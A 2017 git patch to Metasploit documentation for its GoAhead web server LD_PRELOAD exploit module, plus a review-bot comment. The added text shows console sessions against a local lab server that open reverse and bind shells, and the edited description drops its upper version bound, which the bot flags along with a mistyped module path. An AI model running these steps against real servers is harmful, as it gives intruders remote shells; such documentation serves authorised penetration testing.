From eb696ee5cfdd608eec809762853195fd9947bb8a Mon Sep 17 00:00:00 2001 From: HD Moore Date: Thu, 28 Dec 2017 16:30:04 -0600 Subject: [PATCH] Documentation update --- .../exploit/linux/http/goahead_ldpreload.md | 91 +++++++++++++++---- .../exploits/linux/http/goahead_ldpreload.rb | 2 +- 2 files changed, 74 insertions(+), 19 deletions(-) diff --git a/documentation/modules/exploit/linux/http/goahead_ldpreload.md b/documentation/modules/exploit/linux/http/goahead_ldpreload.md index 168b43fa6b..d36f7159f1 100644 --- a/documentation/modules/exploit/linux/http/goahead_ldpreload.md +++ b/documentation/modules/exploit/linux/http/goahead_ldpreload.md @@ -16,7 +16,7 @@ git checkout tags/v3.6.4 -q make > /dev/null cd test gcc ./cgitest.c -o cgi-bin/cgitest -sudo ../build/linux-x64-default/bin/goahead +../build/linux-x64-default/bin/goahead . 127.1.1.1:8080 ``` ## Verification Steps @@ -25,7 +25,7 @@ sudo ../build/linux-x64-default/bin/goahead 1. Install the application 2. Start msfconsole - 3. Do: ```use exploit/linux/http/goahead_cgi_exec``` + 3. Do: ```use exploit/linux/http/goahead_ldpreload``` 4. Do: ```set rhost [ip]``` 5. Do: ```exploit``` 6. You should get a shell. 
@@ -41,21 +41,76 @@ sudo ../build/linux-x64-default/bin/goahead ### GoAhead 3.6.4 on Ubuntu 16.04 x64 ``` -[*] Processing goahead.rc for ERB directives. -resource (goahead.rc)> use exploit/linux/http/goahead_cgi_exec -resource (goahead.rc)> set verbose true -verbose => true -resource (goahead.rc)> set rhost 127.1.1.1 -rhost => 127.1.1.1 -resource (goahead.rc)> check - -resource (goahead.rc)> exploit -[*] Started reverse TCP handler on 127.1.1.1:4444 -[*] Sending Exploit to /cgi-bin/cgitest -[*] Command shell session 1 opened (127.1.1.1:4444 -> 127.1.1.1:45762) at 2017-12-23 17:12:39 -0500 -uname -a -Linux goahead 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux -whoami -root +msf> use exploit/linux/http/goahead_preload +msf exploit(goahead_ldpreload) > set RHOST 127.1.1.1 +msf exploit(goahead_ldpreload) > set RPORT 8080 +msf exploit(goahead_ldpreload) > check + +[*] Searching 390 paths for an exploitable CGI endpoint... +[+] Exploitable CGI located at /cgi-bin/cgitest +[+] 127.1.1.1:8080 The target is vulnerable. + +msf exploit(goahead_ldpreload) > exploit + +[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress? +[*] Started reverse TCP handler on 127.0.0.1:4444 +[*] Searching 390 paths for an exploitable CGI endpoint... +[+] Exploitable CGI located at /cgi-bin/cgitest +[*] Command shell session 4 opened (127.0.0.1:4444 -> 127.0.0.1:32988) at 2017-12-28 16:26:50 -0600 + +uname -a +Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux +exit + +msf exploit(goahead_ldpreload) > set TARGET 1 +msf exploit(goahead_ldpreload) > unset PAYLOAD +msf exploit(goahead_ldpreload) > exploit + +[*] Started bind handler +[*] Searching 390 paths for an exploitable CGI endpoint... 
+[+] Exploitable CGI located at /cgi-bin/cgitest +[*] Command shell session 5 opened (127.0.0.1:30836 -> 127.1.1.1:4444) at 2017-12-28 16:28:04 -0600 + +uname -a +Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux +exit + +msf exploit(goahead_ldpreload) > set TARGET 2 +msf exploit(goahead_ldpreload) > unset PAYLOAD +msf exploit(goahead_ldpreload) > exploit + +[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress? +[*] Started reverse TCP double handler on 127.0.0.1:4444 +[*] Searching 390 paths for an exploitable CGI endpoint... +[+] Exploitable CGI located at /cgi-bin/cgitest +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo sNRXNjxWl7ic0uWw; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket B +[*] B: "sNRXNjxWl7ic0uWw\r\n" +[*] Matching... +[*] A is input... +[*] Command shell session 6 opened (127.0.0.1:4444 -> 127.0.0.1:32995) at 2017-12-28 16:28:56 -0600 + +uname -a +Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux + + +msf exploit(goahead_ldpreload) > set TARGET 4 +msf exploit(goahead_ldpreload) > unset PAYLOAD +msf exploit(goahead_ldpreload) > exploit + +[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress? +[*] Started reverse TCP handler on 127.0.0.1:4444 +[*] Searching 390 paths for an exploitable CGI endpoint... +[+] Exploitable CGI located at /cgi-bin/cgitest +[*] Command shell session 7 opened (127.0.0.1:4444 -> 127.0.0.1:33000) at 2017-12-28 16:29:34 -0600 + +uname -a +Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux + ``` 
diff --git a/modules/exploits/linux/http/goahead_ldpreload.rb b/modules/exploits/linux/http/goahead_ldpreload.rb
index bc4e633d62..e4c73b6b28 100644
--- a/modules/exploits/linux/http/goahead_ldpreload.rb
+++ b/modules/exploits/linux/http/goahead_ldpreload.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'Name' => 'GoAhead Web Server LD_PRELOAD Arbitrary Module Load',
 'Description' => %q{
 This module triggers an arbitrary shared library load vulnerability
- in GoAhead web server versions prior to 3.6.5 that have the CGI module
+ in GoAhead web server versions between 2.5 and that have the CGI module
 enabled.
 },
 'Author' =>
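Review bot: The new description line drops its upper bound: `in GoAhead web server versions between 2.5 and that have the CGI module` reads "between 2.5 and" with no second version after "and", so the affected-version range is now unstated. The removed line gave that bound as "prior to 3.6.5", and the build steps on this page check out tags/v3.6.4, so the line should presumably read `in GoAhead web server versions between 2.5 and 3.6.4 (prior to 3.6.5) that have the CGI module`, or whichever upper bound the author intended. Relatedly, the example session added to the documentation file types `use exploit/linux/http/goahead_preload`, which does not match the module path `goahead_ldpreload` shown in its own prompt lines and in the verification steps. The hash literal this line belongs to, under `class MetasploitModule < Msf::Exploit::Remote`, starts and ends outside the hunk.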